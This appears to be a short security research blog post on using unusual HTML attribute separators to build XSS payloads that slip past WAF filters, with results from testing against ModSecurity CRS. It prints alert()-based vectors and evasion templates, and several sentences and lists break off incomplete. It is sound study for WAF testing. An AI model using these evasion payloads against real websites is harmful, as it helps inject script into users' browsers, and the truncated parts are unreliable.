Using HTML Attribute Separators for Bypassing WAF XSS Filters- 3 mins
This is an experiment I have done recently in order to identify and utilize attribute separators in constructing XSS vectors. The crafted vectors can be used in bypassing XSS filters on modern browsers. These characters can be used in bypassing WAF XSS filters.
An example for a common XSS vector is:
<img src=x onerror=alert(1)>
We will be using this vector as a baseline for the demonstration in this experiment.
An image is requested at
A typical XSS regular expression that blocks this example vector checks for whitespaces. This can be bypassed via the exact vector by using the slash “/” character as an attribute separator (a well-known payload):
Fuzzing for Valid Attributes Separators in Modern Browsers
Horizontal Tab (
In addition to the previously known characters: Space (0x20) and Slash (0x2F) characters.
Notes on Bypassing WAFs Using Identified Attributes Separators
In general, WAF rule sets are strict on blocking certain inputs. By utilizing odd attribute separators, it’s possible to bypass weakly written WAF rules. This is an aid to construct a valid XSS vector; I do not expect a vanilla
<img(attribute-separator)src=x(attribute-separator)onerror=alert(1)> would be a straight payload that bypasses a WAF rule set directly. Instead, tweaking the payload can increase the potentials in writing a valid vector that bypass the WAF XSS filters.
Furthermore, I have demonstrated a number of payloads previously that utilizes attribute separators implicitly to bypass XSS filters of popular WAFs. You can read about my previous research at Link.
The techniques were tested against Mod-Security CRS. The default installation blocks almost all variants; raising the Paranoia Level to 2 protects from the remaining payloads. I would like to thank Dr. Christian Folini for testing it against ModSecurity CRS.
What to Do?
These characters can be used to craft better payloads to fuzz WAF XSS filters. Feel free to use them on your next WAF assessment.
Consider different HTML attribute separators when constructing filters. It can be used to bypass rulesets.